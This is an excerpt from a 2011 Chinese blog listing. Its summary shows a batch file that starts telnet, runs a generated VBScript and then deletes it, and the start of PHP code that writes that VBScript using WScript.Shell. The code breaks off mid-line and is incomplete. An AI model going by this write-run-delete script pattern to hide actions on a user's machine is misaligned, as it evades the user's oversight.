摘要:
批处理文件rule.bat@echo off if exist "1.vbs" start telnet&cscript //nologo 1.vbs&del 1.vbs rule<?php function address($addresss) { echo $addresss; $f=fopen('1.vbs','w'); fwrite($f,'set sh=WScript.CreateObject("WScript.Shell")'."\r\n"); fwri 阅读全文
posted @ 2011-10-24 13:26
平渡飞扬
阅读(920)
评论(0)
推荐(0)